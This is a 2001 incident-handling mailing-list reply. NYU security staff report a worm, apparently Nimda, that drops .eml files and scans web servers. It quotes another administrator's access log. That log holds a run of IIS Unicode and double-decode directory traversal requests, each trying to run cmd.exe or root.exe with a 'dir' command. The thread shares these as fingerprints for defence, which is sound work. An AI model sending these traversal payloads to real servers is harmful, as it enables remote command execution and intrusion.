Re: CodeBlue finally hitting, or what?

[Tracey Losco <tal1 () acf3 nyu edu>]

We are seeing the same thing here at NYU.  I just got off of the 
phone with someone from another University who said that he also saw 
a group of files deposited this morning approximately the same time 
that the machines started their poking around.

The files were:

readme.eml
sample.eml
desktop.eml

He said that they appear to be executables mime encoded as wavefiles. 
We also started seeing the scanning at approximately 10:00am.

At 10:24 AM -0400 9/18/01, Portnoy, Gary wrote:
> Greetings,
>
> I am suddenly seeing hundreds of Unicode traversal requests coming in from
> all over the world, many of them from previous CodeRed victims.  I am
> guessing someone changed CodeBlue to make it spread faster, because before I
> saw maybe 1 or 2 CodeBlue attempts a day, and so far i've seen at least 20
> in the last hour.  Just a a way to help fingerprint it, a few of the
> attempted exploits use the multiple decode vulnerability....
>
> -Gary-
>
> 12.27.232.252 - - [18/Sep/2001:10:16:47 -0400] "GET /scripts/root.exe?/c+dir
> HTTP/1.0" 404 287 "-" "-"
> 12.27.232.252 - - [18/Sep/2001:10:16:48 -0400] "GET /MSADC/root.exe?/c+dir
> HTTP/1.0" 404 285 "-" "-"
> 12.27.232.252 - - [18/Sep/2001:10:16:48 -0400] "GET
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295 "-" "-"
> 12.27.232.252 - - [18/Sep/2001:10:16:49 -0400] "GET
> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295 "-" "-"
> 12.27.232.252 - - [18/Sep/2001:10:16:49 -0400] "GET
> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-" "-"
> 12.27.232.252 - - [18/Sep/2001:10:16:50 -0400] "GET
> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 326 "-" "-"
> 12.27.232.252 - - [18/Sep/2001:10:16:50 -0400] "GET
> /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 326 "-" "-"
> 12.27.232.252 - - [18/Sep/2001:10:16:50 -0400] "GET
> /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
> stem32/cmd.exe?/c+dir HTTP/1.0" 404 342 "-" "-"
> 12.27.232.252 - - [18/Sep/2001:10:16:51 -0400] "GET
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-"
> 12.27.232.252 - - [18/Sep/2001:10:16:52 -0400] "GET
> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-"
> 12.27.232.252 - - [18/Sep/2001:10:16:52 -0400] "GET
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-"
> 12.27.232.252 - - [18/Sep/2001:10:16:56 -0400] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-"
> 12.27.232.252 - - [18/Sep/2001:10:16:56 -0400] "GET
> /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292 "-" "-"
> 12.27.232.252 - - [18/Sep/2001:10:17:00 -0400] "GET
> /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292 "-" "-"
> 12.27.232.252 - - [18/Sep/2001:10:17:00 -0400] "GET
> /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-"
> "-"
> 12.27.232.252 - - [18/Sep/2001:10:17:01 -0400] "GET
> /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-" "-"
>
> Gary Portnoy
> Network Administrator
> gportnoy () belenosinc com
>
> PGP Fingerprint: 9D69 6A39 642D 78FD 207C  307D B37D E01A 2E89 9D2C
>
>
> ----------------------------------------------------------------------------
> This list is provided by the SecurityFocus ARIS analyzer service.
> For more information on this free incident handling, management
> and tracking system please see: http://aris.securityfocus.com

--
--------------------------------------------------------------------
Tracey Losco
Network Security Analyst                security () nyu edu
ITS - Network Services                  http://www.nyu.edu/its/security
New York University                     (212) 998 - 3433

PGP Fingerprint: 8FFB FE47 6156 7BF0  B19E 462B 9DFE 51F5

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com